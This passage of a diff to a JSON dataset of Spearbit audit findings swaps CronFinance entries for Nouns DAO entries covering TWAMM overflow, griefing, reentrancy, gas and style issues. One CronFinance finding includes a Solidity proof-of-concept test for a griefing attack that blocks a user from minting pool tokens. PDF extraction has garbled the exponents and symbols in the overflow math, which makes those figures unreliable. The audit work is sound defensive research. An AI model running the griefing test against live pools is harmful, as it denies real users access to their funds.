attacker could be a significantly smaller proportion of the pool and still find this attack profitable. They could also JIT the liquidity since the early withdrawal penalty has been removed. The attack becomes infeasible for very large pools (has to happen over multiple TXs so can't flash loan --need own capital), but is relevant in practice.", + "title": "escrowedTokensByForkId can be used to get owner of escrowed tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "The state variable escrowedTokensByForkId in L58 creates a getter function that can be used to check the owner of escrowed token. This performs the same function as calling ownerOfEscrowedToken() and might be considered redundant.", "labels": [ "Spearbit", - "CronFinance", - "Severity: High Risk" + "Nouns", + "Severity: Gas Optimization" ] }, { - "title": "Loss of Long-Term Swap Proceeds Likely in Pools With Decimal or Price Imbalances", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "This TWAMM implementation tracks the proceeds of long-term swaps efficiently via accumulated values called \"scaled proceeds\" for each token. In every order block interval (OBI), the scaled proceeds for e.g. the sale of token 0 are incremented by (quantity of token 1 purchased during the OBI) (cid:3)264= (sales rate of token 0 during the OBI) Then the proceeds of any specific long-term swap can be computed as the product of the difference between the scaled proceeds at the current block (or the expiration block of the order if filled) and the last block for which proceeds were claimed for the order and the order's sales rate, divided by 264: last := min(currentBlock, orderExpiryBlock) prev := block of last proceeds collection, or block order was placed in if this is the first withdrawal LT swap proceeds = (scaledProceedsl ast (cid:0) scaledProceedsprev ) (cid:3) (ordersalesrate)=264 The value 264 is referred to as the \"scaling factor\" and is intended to reduce precision loss in the division to determine the increment to the scaled proceeds. The addition to increment the scaled proceeds and the subtraction to compute its net change is both intentionally done with unchecked arithmetic--since only the difference matters, so long as at most one overflow occurs between claim-of-proceeds events for any given order, the computed proceeds will be correct (up to rounding errors). If two or more overflows occur, however, funds will be lost by the swapper (unclaimable and locked in the contract). Additionally, to cut down on gas costs, the scaled proceeds for the two tokens are packed into a single storage slot, so that only 128 bits are available for each value. This makes multiple overflows within the lifetime of a single order more likely. The CronFi team was aware of this at the start of the audit and specifically requested it be investigated, though they expected a maximum order length of 5 years to be sufficient to avoid the issue in practice. The scaling factor of 264 is approximately 1.8 (cid:3) 1019, close to the unit size of an 18-decimal token. It indeed works well if both pool tokens have similar decimals and relative prices that do not differ by too many orders of magnitude, as the quantity purchased and the sales rate will then be of similar magnitude, canceling to within a few powers of ten (2128 3.4 (cid:3) 1038, leaving around 19 orders of magnitude after accounting for the scaling factor). However, in pools with large disparities in price, decimals, or both, numerical issues are easy to encounter. The most extreme, realistic example would be a DAI-GUSD pool. DAI has 18 decimals while GUSD has only 2. We will treat the price of DAI and GUSD as equal for this analysis, as they are both stablecoins, and arbitrage of the TWAMM pool should prevent large deviations. Selling GUSD at a rate of 1000 per block, with an OBI of 64 (the stable pool order block interval in the audited commit) results in an increment of the scaled proceeds per OBI of: increment = (64 (cid:3) 1000 (cid:3) 1018) (cid:3) 264=(1000 (cid:3) 102) = 1.18 (cid:3) 1037 7 This will overflow an unsigned 128 bit integer after 29 OBIs; at 12 seconds per block, this means the first overflow occurs after 12 (cid:3) 64 (cid:3) 29 = 22272 seconds or about 6.2 hours, and thus the first double overflow (and hence irrevocable loss of proceeds if a withdrawal is not executed in time) will occur within about 12.4 hours (slightly but not meaningfully longer if the price is pushed a bit below 1:1, assuming a deep enough pool or reasonably efficient arbitrage). Since the TWAMM is intended to support swaps that take days, weeks, months, or even years to fill, without requiring constant vigilance from every long-term swapper, this is a strong violation of safety. A less extreme but more market-relevant example would be a DAI-WBTC pool. WBTC has 8 instead of 2 decimals, but it is also more than four orders of magnitude more valuable per token than DAI, making it only about 2 orders of magnitude \"safer\" than a DAI-GUSD pool. Imitating the above calculation with 20_000 DAI = 1 WBTC and selling 0.0025 WBTC (~$50) per block with a 257 block OBI yields: increment = (257 (cid:3) 50 (cid:3) 1018) (cid:3) 264=(0.0025 (cid:3) 108) = 9.48 (cid:3) 1035 OBI to overflow = ceiling(2128=(9.48 (cid:3) 1035)) = 359 time to overflow = 12 (cid:3) 257 (cid:3) 359 = 1107156 seconds = 307 hours = 12.8 days , or a little more than a day to encounter the second overflow. While less bad than the DAI-GUSD example, this is still likely of significant concern given that the CronFi team indicated these are parameters under which the TWAMM should be able to function safely and DAI-WBTC is a pair of interest for the v1 product. It is worth noting that these calculations are not directly dependent on the quantity being sold so long as the price stays roughly constant--any change in the selling rate will be compensated by a proportional change in the proceeds quantity as their ratio is determined by price. Thus the analysis depends only on relative price and relative decimals, to a good approximation--so a WBTC-DAI pool can be expected to experience an overflow roughly every two weeks at prevailing market prices, so long as the net selling rate is non-zero.", + "title": "Emit events using locally assigned variables instead of reading from storage to save on SLOAD", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "By emitting local variables over storage variables, when they have the same value, you can save gas on SLOAD. Some examples include: NounsDAOLogicV1Fork.sol#L619 : - + emit VotingDelaySet(oldVotingDelay, votingDelay); emit VotingDelaySet(oldVotingDelay, newVotingDelay); NounsDAOLogicV1Fork.sol#L635 : - + emit VotingPeriodSet(oldVotingPeriod, votingPeriod); emit VotingPeriodSet(oldVotingPeriod, newVotingPeriod); NounsDAOLogicV1Fork.sol#L653 : - + emit ProposalThresholdBPSSet(oldProposalThresholdBPS, proposalThresholdBPS); emit ProposalThresholdBPSSet(oldProposalThresholdBPS, newProposalThresholdBPS); NounsDAOLogicV1Fork.sol#L670 : - emit QuorumVotesBPSSet(oldQuorumVotesBPS, quorumVotesBPS); + emit QuorumVotesBPSSet(oldQuorumVotesBPS, newQuorumVotesBPS); NounsDAOExecutorV2.sol#L104 : - + emit NewDelay(delay); emit NewDelay(delay_); NounsDAOExecutorV2.sol#L112 : - + emit NewAdmin(admin); emit NewAdmin(msg.sender); NounsDAOExecutorV2.sol#L122 : - + emit NewPendingAdmin(pendingAdmin); emit NewPendingAdmin(pendingAdmin_); NounsDAOV3Admin.sol#L284 : - + emit NewPendingAdmin(oldPendingAdmin, ds.pendingAdmin); emit NewPendingAdmin(oldPendingAdmin, address(0)); NounsDAOProxy.sol#L85 : - + emit NewImplementation(oldImplementation, implementation); emit NewImplementation(oldImplementation, implementation_);", "labels": [ "Spearbit", - "CronFinance", - "Severity: High Risk" + "Nouns", + "Severity: Gas Optimization" ] }, { - "title": "An attacker can block any address from joining the Pool and minting BLP Tokens by filling the joinEventMap mapping.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "An attacker can block any address from minting BLP Tokens. This occurs due to the MAX_JOIN_- EVENTS limit, which is present in the JoinEventLib library. The goal for an attacker is to block a legitimate user from minting BLP Tokens, by filling the joinEventMap mapping. The attacker can fill the joinEventMap mapping by performing the following steps: The attacker mints BLP Tokens from 50 different addresses. Each address transfers the BLP Tokens, alongside the join events, to the user targeted with a call to the CronV1Pool(pool).transfer and CronV1Pool(pool).transferJoinEvent functions respectively. Those transfers should happen in different blocks. After 50 blocks (50 * 12s = 10 minutes) the attacker has blocked the legitimate user from minting _BLP Tokens_, as the maximum size of the joinEventMap mapping has been reached. 8 The impact of this vulnerability can be significant, particularly for smart contracts that allow users to earn yield by providing liquidity in third-party protocols. For example, if a governance proposal is initiated to generate yield by providing liquidity in a CronV1Pool pool, the attacker could prevent the third-party protocol from integrating with the CronV1Pool protocol. A proof-of-concept exploit demonstrating this vulnerability can be found below: function testGriefingAttack() public { console.log(\"-----------------------------\"); console.log(\"Many Users mint BLP tokens and transfer the join events to the user 111 in order to fill the array!\"); ,! for (uint j = 1; j < 51; j++) { _addLiquidity(pool, address(j), address(j), 2_000, 2_000, 0); vm.warp(block.timestamp + 12); vm.startPrank(address(j)); //transfer the tokens CronV1Pool(pool).transfer(address(111), CronV1Pool(pool).balanceOf(address(j))); //transfer the join events to the address(111) CronV1Pool(pool).transferJoinEvent(address(111), 0 , CronV1Pool(pool).balanceOf(address(j))); vm.stopPrank(); } console.log(\"Balance of address(111) before minting LP Tokens himself\", ,! ICronV1Pool(pool).balanceOf(address(111))); //user(111) wants to enter the pool _addLiquidity(pool, address(111), address(111), 5_000, 5_000, 0); console.log(\"Join Events of user address(111): \", ICronV1Pool(pool).getJoinEvents(address(111)).length); console.log(\"Balance of address(111) after adding the liquidity: \", ICronV1Pool(pool).balanceOf(address(111))); ,! ,! }", + "title": "joinFork() violates Checks-Effects-Interactions best practice for reentrancy mitigation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "joinFork() interacts with forkDAOTreasury in sendProRataTreasury() to send pro rata original DAO treasury for the tokens joining the fork. This interaction with the external forkDAOTreasury contract happens before the transfer of the original DAO tokens to the timelock is effected. While forkDAOTreasury is under the control of the fork DAO (outside the trust model of original DAO) and join- Fork() does not have a reentrancy guard, we do not see a potential/meaningful exploitable reentrancy here.", "labels": [ "Spearbit", - "CronFinance", - "Severity: High Risk" + "Nouns", + "Severity: Informational" ] }, { - "title": "The executeVirtualOrdersToBlock function updates the oracle with the wrong block.number", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "The executeVirtualOrdersToBlock is external, meaning anyone can call this function to execute virtual orders. The _maxBlock parameter can be lower block.number which will make the oracle malfunction as the oracle update function _updateOracle uses the block.timestamp and assumes that the update was called with the reserves at the current block. This will make the oracle update with an incorrect value when _maxBlock can be lower than block.number.", + "title": "Rename MAX_VOTING_PERIOD and MAX_VOTING_DELAY to enhance readability.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "Given that the state variables MAX_VOTING_PERIOD (NounsDAOV3Admin.sol#L115) and MAX_VOT- ING_DELAY (NounsDAOV3Admin.sol#L121) are in blocks, it is more readable if the name has a _BLOCKS suffix and is set to 2 weeks / 12 as done with MAX_OBJECTION_PERIOD_BLOCKS and MAX_UPDATABLE_PERIOD_BLOCKS. The functions, _setVotingDelay (L152) and _setVotingPeriod (L167), can be renamed in the same vain by adding -InBlocks suffix similar to _setObjectionPeriodDurationInBlocks and other functions. In addition to this, constants should be named with all capital letters with underscores separating words, follow- ing the Solidity style guide. For example, proposalMaxOperations in NounsDAOV3Proposals.sol#L138 can be renamed.", "labels": [ "Spearbit", - "CronFinance", - "Severity: High Risk" + "Nouns", + "Severity: Informational" ] }, { - "title": "The _join function does not check if the recipient is address(0)", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "As stated within the Balancer's PoolBalances.sol // The Vault ignores the `recipient` in joins and the `sender` in exits: it is up to the Pool to keep track of ,! // their participation. The recipient is not checked if it's the address(0), that should happen within the pool implementation. Within the Cron implementation, this check is missing which can cause losses of LPs if the recipient is sent as address(0). This can have a high impact if a 3rd party integration happens with the Cron pool and the \"joiner\" is mistakenly sending an address(0). This becomes more dangerous if the 3rd party is a smart contract implementation that connects with the Cron pool, as the default value for an address is the address(0), so the probability of this issue occurring increases.", + "title": "External function is used instead of internal equivalent across NounsDAOV3Proposals logic", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "Public view state(ds, proposalId) is used instead of the fully equivalent internal stateInter- nal(ds, proposalId) in the several occurrences of NounsDAOV3Proposals logic. For example, in the NounsDAOV3Proposals:updateProposalBySigs the state(ds, proposalId) is used instead of the stateInternal function: if (state(ds, proposalId) != NounsDAOStorageV3.ProposalState.Updatable) revert ,! CanOnlyEditUpdatableProposals(); 49", "labels": [ "Spearbit", - "CronFinance", - "Severity: Low Risk" + "Nouns", + "Severity: Informational" ] }, { - "title": "Canonical token pairs can be griefed by deploying new pools with malicious admins", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "function create( address _token0, address _token1, string memory _name, string memory _symbol, uint256 _poolType, address _pauser ) external returns (address) { CronV1Pool.PoolType poolType = CronV1Pool.PoolType(_poolType); requireErrCode(_token0 != _token1, CronErrors.IDENTICAL_TOKEN_ADDRESSES); (address token0, address token1) = _token0 < _token1 ? (_token0, _token1) : (_token1, _token0); requireErrCode(token0 != address(0), CronErrors.ZERO_TOKEN_ADDRESSES); requireErrCode(getPool[token0][token1][_poolType] == address(0), CronErrors.EXISTING_POOL); address pool = address( new CronV1Pool(IERC20(_token0), IERC20(_token1), getVault(), _name, _symbol, poolType, ,! address(this), _pauser) ); //... Anyone can permissionlessly deploy a pool, with it then becoming the canonical pool for that pair of tokens. An attacker is able to pass a malicious _pauser the twamm pool, preventing the creation of a legitimate pool of the same type and tokens. This results in race conditions between altruistic and malicious pool deployers to set the admin for every token pair. 10 Malicious actors may grief the protocol by attempting to deploy token pairs with and exploiting the admin address, either deploying the pool in a paused state, effectively disabling trading for long-term swaps with the pool, pausing the pool at an unknown point in the future, setting fee and holding penalty parameters to inappropriate values, or setting illegitimate arbitrage partners and lists. This requires the factory owner to remove the admin of each pool individually and to set a new admin address, fee parameters, holding periods, pause state, and arbitrage partners in order to recover each pool to a usable condition if the griefing is successful.", + "title": "Proposals created through proposeBySigs() can not be executed on TimelockV1", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "Currently, proposals created through the proposeBySigs() function can not be executed on Time- lockV1. This could potentially limit the flexibility of creating different types of proposals. It may be advantageous to have a parameter added to the proposeBySigs() function, allowing the proposer to decide whether the proposal should be executed on TimelockV1 or not. There's a design decision to be made regarding whether this value should be incorporated as part of the signers' signature, or simply left up to the proposer to determine if execution should happen on the TimelockV1 or not.", "labels": [ "Spearbit", - "CronFinance", - "Severity: Low Risk" + "Nouns", + "Severity: Informational" ] }, { - "title": "Refund Computation in _withdrawLongTermSwap Contains A Risky Underflow", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "Nothing prevents lastVirtualOrderBlock from advancing beyond the expiry of any given long-term swap, so the unchecked subtraction here is unsafe and can underflow. Since the resulting refund value will be extremely large due to the limited number of blocks that can elapse and the typical prices and decimals of tokens, the practical consequence will be a revert due to exceeding the pool and order balances. However, this could be used to steal funds if the value could be maliciously tuned, for example via another hypothetical bug that allowed the last virtual order block or the sales rate of an order to be manipulated to an arbitrary value.", + "title": "escrowToFork() can be frontrun to prevent users from joining the fork during the escrow period", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "escrowToFork() could be frontrun by another user and make it revert by either: 1. Frontrunning with another escrowToFork() that reaches the fork threshold + executeFork(). 2. If the fork threshold was already reached, frontrunning with executeFork(). This forces the escrowing user to join the fork only during the forking period.", "labels": [ "Spearbit", - "CronFinance", - "Severity: Low Risk" + "Nouns", + "Severity: Informational" ] }, { - "title": "Function transferJoinEvent Permits Transfer-to-Self", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "Though the error code indicates the opposite intent, this check will permit transfer-to-self (|| used instead of &&).", + "title": "Fork spec says Nouns are escrowed during the fork active period", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "Fork-Spec says: \"During the forking period additional forking Nouns are also sent to the escrow contract; the motivation is to have a clean separation between fork-related Nouns and Nouns owned by the DAO for other reasons.\" However, the implementation sends such Nouns to the original DAO treasury.", "labels": [ "Spearbit", - "CronFinance", - "Severity: Low Risk" + "Nouns", + "Severity: Informational" ] }, { - "title": "One-step owner change for factory owner", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "The factory owner can be changed with a single transaction. As the factory owner is critical to managing the pool fees and other settings an incorrect address being set as the owner may result in unintended behaviors.", + "title": "Known issues from previous versions/audit", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "Below are some of the known issues from previous versions as reported by the protocol team, documented in the audit report and is being recorded here verbatim for reporting purposes. Note: All issues reported earlier and not fixed in current version(s) of audit scope are assumed to be acknowledged without fixing. NounsToken delegateBySigs allows delegating to address zero Weve fixed this issue in the fork token contract, but cannot fix it in the original NounsToken because the contract isnt upgradeable. Voting gas refund can be abused Were aware of different ways of abusing this function: A token holder could delegate their Nouns to a contract and vote on multiple proposals in a loop, such that the tx gas overhead is amortized across all votes, while the refund function assumes each vote has the full overhead to bear; this could result in token holders profiting from gas refunds. A token holder could grief the DAO by voting with very long reason strings, in order to drain the refund balance faster. We find these issues low risk and unlikely given the small size of the community, and the low ETH balance the governor contract has to spend on refunds. Should we see such abusive activity, we might reconsider this feature. Nouns transfers will stop working when block number hits uint32 max value Were aware of this issue. It means the Nouns token will stop functioning a long long long time from now :) AuctionHouse has an open gas griefing vector Bidder Alice can bid from a smart contract that returns a large byte array when receiving ETH. Then if Bob outbids Alice, in his bid tx AuctionHouse refunds Alice, and the large return value causes a gas cost spike for Bob. See more details here. Were planning to fix this in the next AuctionHouse version, its launch date is unknown at this point. Using error strings instea of custom errors In all new code were using custom errors. In code thats forked from previous versions we optimized for the smallest diff possible, and so leaving error strings untouched.", "labels": [ "Spearbit", - "CronFinance", - "Severity: Low Risk" + "Nouns", + "Severity: Informational" ] }, { - "title": "Factory owner may front run large orders in order to extract fees", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "The factory owner may be able to front-run large trades in order to extract more fees if compromised or becomes malicious in one way or another. Similarly, pausing may also allow for skipping the execution of virtual orders before exiting.", + "title": "When a minority forks, the majority can follow", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "This is a known issue as documented by the protocol team and is being recorded here verbatim for reporting purposes. For example, a malicious majority can vote For a proposal to drain the treasury, forcing others to fork; the majority can then join the fork with many of their tokens, benefiting from the passing proposal on the original DAO, while continuing to attack the minority in their new fork DAO, forcing them to quit the fork DAO. This is a well known flaw of the current fork design, something weve chosen to go live with for the sake of shipping something the DAO has asked for urgently.", "labels": [ "Spearbit", - "CronFinance", - "Severity: Low Risk" + "Nouns", + "Severity: Informational" ] }, { - "title": "Join Events must be explicitly transfered to recipient after transfering Balancer Pool Tokens in order to realize the full value of the tokens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "Any user receiving LP tokens transferred to them must be explicitly transferred with a join event in order to redeem the full value of the LP tokens on exit, otherwise the address transferred to will automatically get the holding penalty when they try to exit the pool. Unless a protocol specifically implements transferJoinEvent function compatibility all LP tokens going through that protocol will be worth a fraction of their true value even after the holding period has elapsed.", + "title": "The original DAO can temporarily brick a fork DAOs token minting", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "This is a known issue as documented by the protocol team and is being recorded here verbatim for reporting purposes. Weve decided in this version to deploy fork DAOs such that fork tokens reuse the same descriptor contract as the original DAOs token descriptor. Our motivations are minimizing lines of code and the gas cost of deploying a fork. This design poses a risk on fork tokens: the original DAO can update the descriptor to use a new art contract that always reverts, which would then lead to fork tokens mint function always reverting. The solution would be for the fork DAO to execute a proposal that deploys and sets a new descriptor to its token, which would use a valid art contract, allowing minting to resume. The fork DAO is guaranteed to be able to propose and execute such a proposal, because the function where Nouners claim their fork tokens does not use the descriptor, and so is not vulnerable to this attack.", "labels": [ "Spearbit", - "CronFinance", - "Severity: Low Risk" + "Nouns", + "Severity: Informational" ] }, { - "title": "Order Block Intervals(OBI) and Max Intervals are calculated with 14 second instead of 12 second block times", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "The CronV1Pool contract calculates both the Order Block Intervals (OBI) and the Max Intervals of the Stable/Liquid/Volatile pairs with 14 second block times. However, after the merge, 12 second block time is enforced by the Beacon Chain.", + "title": "Unused events, missing events and unindexed event parameters in contracts", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "Some contracts have missing or unused events, as well as event parameters that are unindexed. As an examples: 1. Unused events: INounsTokenFork.sol#L29: event NoundersDAOUpdated(address noundersDAO); 2. Missing events: NounsDAOV3Admin.sol#L509-514: Missing event like in _setForkEscrow 3. Unindexed parameters: NounsDAOEventsFork.sol: Many parameters can be indexed here", "labels": [ "Spearbit", - "CronFinance", - "Severity: Low Risk" + "Nouns", + "Severity: Informational" ] }, { - "title": "One-step status change for pool Admins", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "Admin status can be changed in a single transaction. This may result in unintended behaviour if the incorrect address is passed.", + "title": "Prefer using __Ownable_init instead of _transferOwnership to initialize upgradable contracts", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "The upgradable NounsAuctionHouseFork and the NounsTokenFork contracts inherit the OwnableUp- gradeable contract. However, inside the initialize function the ownership transfer is performed by calling the internal _transferOwnership function instead of calling the __Ownable_init. This deviates from the standard ap- proach of initializing upgradable contracts, and it can lead to issues if the OwnableUpgradeable contract changes its initialization mechanism.", "labels": [ "Spearbit", - "CronFinance", - "Severity: Low Risk" + "Nouns", + "Severity: Informational" ] }, { - "title": "Incomplete token simulation in CronV1Pool due to missing queryJoin and queryExit functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "he CronV1Pool contract is missing the queryJoin and queryExit functions, which are significant for calculating maxAmountsIn and/or minBptOut on pool joins, and minAmountsOut and/or maxBptIn on pool exits, respectively. The ability to calculate these values is very important in order to ensure proper enforcement of slippage tolerances and mitigate the risk of sandwich attacks.", + "title": "Consider emitting the address of the timelock in the ProposalQueued event", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "The queue function currently emits the ProposalQueued event to provide relevant information about the proposal, including the proposalId and the eta. However, it doesn't emit the timelock variable, which rep- resents the address of the timelock responsible for executing the proposal. This could lead to confusion among users regarding the intended timelock for proposal execution.", "labels": [ "Spearbit", - "CronFinance", - "Severity: Low Risk" + "Nouns", + "Severity: Informational" ] }, { - "title": "A partner can trigger ROC update", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "A partner can trigger rook update if they return rook's current list within an update. Scenario A partner calls updateArbitrageList, the IArbitrageurList(currentList).nextList() returns rook's rook- PartnerContractAddr and gets updated, the partner calls updateArbitrageList again, so this time isRook will be true.", + "title": "Use IERC20Upgradeable/IERC721Upgradeable for consistency with other contracts", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "Most contracts/libraries imported and used are the upgradeable variant e.g. OwnableUpgradeable. IERC20 and IERC721 are used which is inconsistent with the other contracts/libraries. Since the project is deployed with upgradeability featured, it is more preferable to use the Upgradeable variant of OpenZeppelin Contracts.", "labels": [ "Spearbit", - "CronFinance", - "Severity: Low Risk" + "Nouns", + "Severity: Informational" ] }, { - "title": "Approved relayer can steal cron's fees", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "A relayer within Balancer is set per vault per address. If feeAddr will ever add a relayer within the balancer vault, the relayer can call exitPool with a recipient of their choice, and the check on line 225 will pass as the sender will still be feeAddr but the true msg.sender is the relayer.", + "title": "Specification says \"Pending\" state instead of \"Updatable\"", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "The V3 spec says the following for \"Proposal editing\": \"The proposer account of a proposal in the PENDING state can call an updateProposal function, providing the new complete set of transactions to execute, as well as a complete new version of the proposal description text.\" This is incorrect because editing can only happen in the \"Updatable\" state which is just before the \"Pending\" state.", "labels": [ "Spearbit", - "CronFinance", - "Severity: Low Risk" + "Nouns", + "Severity: Informational" ] }, { - "title": "Price Path Due To Long-Term Orders Neglected In Oracle Updates", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "The _updateOracle() function takes its price sample as the final price after virtual order execution for whatever time period has elapsed since the last join/exit/swap. Since the price changes continuously during that interval if there are long-term orders active (unlike in Uniswap v2 where the price is constant between swaps), this is inaccurate - strictly speaking, one should integrate over the price curve as defined by LT orders to get a correct sample. The longer the interval, the greater the potential for inaccuracy.", + "title": "Typos, comments and descriptions need to be updated", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "comments/descriptions. The contract Typos: source code contains several typographical errors and misaligned 1. NounsDAOLogicV1Fork.sol#L48: adjutedTotalSupply should be adjustedTotalSupply 2. NounsDAOLogicV1Fork.sol#L80: veteor shoud be vetoer 3. NounsDAOV3Votes.sol#L267: objetion should be objection 4. NounsDAOExecutorProxy.sol#L24: imlemenation should be implementation Comment Discrepancies: 1. NounsDAOV3Admin.sol#L130: Should say // 6,000 basis points or 60% and not 4,000 2. NounsDAOV3Votes.sol#L219: change string 'NounsDAO::castVoteInternal: voter already voted' to 'NounsDAO::castVoteDuringVotingPeriodInternal: voter already voted' 54 3. NounsDAOExecutorV2.sol#L209: change string 'NounsDAOExecutor::executeTransaction: Call must come from admin. to 'NounsDAOExecutor::sendETH: Call must come from admin. 4. NounsDAOExecutorV2.sol#L221: change string NounsDAOExecutor::executeTransaction: Call must come from admin. to NounsDAOExecutor::sendERC20: Call must come from admin. 5. NounsDAOV3DynamicQuorum.sol#L124: Should be adjusted total supply 6. NounsDAOV3DynamicQuorum.sol#L135: Should be adjusted total supply 7. NounsDAOLogicV3.sol#L902: Adjusted supply is used for minQuorumVotes() 8. NounsDAOLogicV3.sol#L909: Adjusted supply is used for maxQuorumVotes() 9. NounsDAOStorageV1Fork.sol#L33: proposalThresholdBPS is required to be exceeded, say when it is zero, one noun is needed to propose 10. NounsTokenFork.sol#L66: Typo, to be after which", "labels": [ "Spearbit", - "CronFinance", - "Severity: Low Risk" + "Nouns", + "Severity: Informational" ] }, { - "title": "Vulnerabilities noted from npm audit", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "npm audit notes: 76 vulnerabilities (5 low, 16 moderate, 27 high, 28 critical).", + "title": "Contracts are not using the _disableInitializers function", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "Several Nouns-Dao contracts utilize the Initializable module provided by OpenZeppelin. To ensure that an implementation contract is not left uninitialized, it is recommended in OpenZeppelin's documentation to include the _disableInitializers function in the constructor. The _disableInitializers function automatically locks the contracts upon deployment. According to the OpenZeppelin documentation: Do not leave an implementation contract uninitialized. An uninitialized implementation contract can be taken over by an attacker, which may impact the proxy. To prevent the implementation contract from being used, you should invoke the _disableInitializers function in the constructor to automatically lock it when it is deployed:", "labels": [ "Spearbit", - "CronFinance", - "Severity: Low Risk" + "Nouns", + "Severity: Informational" ] }, { - "title": "Optimization: Merge CronV1Pool.sol & VirtualOrders.sol (Changes from dev team added to audit.)", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "A lot of needless parameter passing is done to accommodate the file barrier between CronV1Pool & VirtualOrdersLib, which is an internal library. Some parameters are actually immutable variables.", + "title": "Missing or incomplete Natspec documentation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "There are several instances throughout the codebase where NatSpec is either missing or incomplete. 1. Missing Natspec (Some functions in this case are missing Natspec comment): NounsDAOV3Fork.sol#L203 NounsDAOV3Votes.sol#L295 NounsDAOV3Admin.sol NounsDAOV3Proposals.sol NounsDAOExecutor.sol NounsDAOExecutorV2.sol 2. Incomplete Natspec (Some functions are missing @param tag): NounsTokenFork.sol NounsDAOV3Admin.sol NounsDAOV3Proposals.sol NounsDAOLogicV3.sol", "labels": [ "Spearbit", - "CronFinance", - "Severity: Gas Optimization" + "Nouns", + "Severity: Informational" ] }, { - "title": "Receive sorted tokens at creation to reduce complexity", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "Currently, when a pool is created, within the constructor, logic is implemented to determine if the to- kens are sorted by address. A requirement that is needed for Balancer Pool creation. This logic adds unnecessary gas consumption and complexity throughout the contract as every time amounts are retrieved from balancer, the Cron Pool must check the order of the tokens and make sure that the difference between sorted (Balancer) and unsorted (Cron) token addresses is handled. An example can be seen in onJoinPool uint256 token0InU112 = amountsInU112[TOKEN0_IDX]; uint256 token1InU112 = amountsInU112[TOKEN1_IDX]; Where the amountsInU112 are retrieved from the balancer as a sorted array, index 0 == token0 and index 1 == token1, but on the Cron side, we must make sure that we retrieved the correct amount based on the tokens being sent as sorted or not when the pool was created.", + "title": "Function ordering does not follow the Solidity style guide", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "The recommended order of functions in Solidity, as outlined in the Solidity style guide, is as follows: constructor(), receive(), fallback(), external, public, internal and private. However, this ordering isn't enforced in the across the Nouns-Dao codebase.", "labels": [ "Spearbit", - "CronFinance", - "Severity: Gas Optimization" + "Nouns", + "Severity: Informational" ] }, { - "title": "Remove double reentrancy checks", - "html_url": 